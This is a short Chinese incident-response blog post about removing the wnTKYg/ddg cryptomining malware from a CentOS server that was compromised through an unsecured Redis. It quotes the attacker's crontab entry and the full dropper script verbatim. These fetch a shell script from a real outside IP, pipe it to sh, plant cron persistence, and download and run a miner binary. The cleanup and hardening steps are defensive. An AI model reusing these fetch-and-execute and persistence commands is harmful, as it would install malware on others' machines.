Centos redis漏洞入侵 清除wnTKYg病毒

今天同事说服务器很慢，查下进程发现CPU被占满，有一个进程命令是"wnTKYg"

找到原因是因为昨天装了redis没有做好安全预防工作，黑客利用redis漏洞进行挖矿

解决思路：

停止wnTKY进程，pkill -9 wnTKY

停止完发现进程还会自动启动

应该是计划任务里面设置任务了

crontab -e

*/5 * * * * curl -fsSL http://???.248.40.228:9999/i.sh?6 | sh

要把个任务计划删除，同时执行crontab -l使新任务计划生效

通过i.sh脚本内容如下

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/5 * * * * curl -fsSL http://???.248.40.228:9999/i.sh?6 | sh" > /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "*/5 * * * * curl -fsSL http://???.248.40.228:9999/i.sh?6 | sh" > /var/spool/cron/crontabs/root if [ ! -f "/tmp/ddg.1009" ]; then     curl -fsSL http://218.248.40.228:9999/1009/ddg.$(uname -m) -o /tmp/ddg.1009 fi chmod +x /tmp/ddg.1009 && /tmp/ddg.1009

脚本已经又建立了两个定期下载的脚本在  /var/spool/cron/root  /var/spool/cron/crontabs/root  这两个文件

最后给挖矿文件授权可执行的权限，最后运行/tmp/ddg.1009这个挖矿文件

要同时删除这两个文件才行

rm -rf  /var/spool/cron/root

rm -rf  /var/spool/cron/crontabs/root

或则直接删除 /var/spool/cron这个文件夹

rm -rf /var/spoo/cron

删除文件之后要在次删除相关进程，ddg.1009，这个进程要删除掉

ps -aux|grep ddg 

防止REDIS再次攻击的方法

把默认的端口号6379给改了
把密码改的更复杂了
把bind xx.xx.x.x   xx.xx.xx.xx改了

关闭挖矿的服务器访问

iptables -A INPUT -s  xmr.crypto-pool.fr -j DROP

iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP